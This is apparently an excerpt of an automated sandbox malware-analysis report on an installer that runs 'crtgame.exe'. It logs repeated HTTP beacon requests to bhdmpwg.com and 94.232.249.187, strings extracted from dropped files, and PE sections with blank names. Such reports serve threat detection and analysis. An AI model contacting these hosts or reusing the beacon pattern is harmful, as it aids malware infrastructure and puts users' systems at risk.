                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: bhdmpwg.com
                  Source: crtgame.exe, 00000007.00000002.3303589391.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.
                  Source: crtgame.exe, 00000007.00000002.3303589391.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde2
                  Source: crtgame.exe, 00000007.00000002.3303589391.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
                  Source: is-1L7JU.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-U01MD.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-I69V3.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-LCCKT.tmp.1.dr, is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: j9htknb7BQ.tmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-TN6ID.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.tmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-J4G02.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-O2JHA.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-NTP22.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  barindex
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
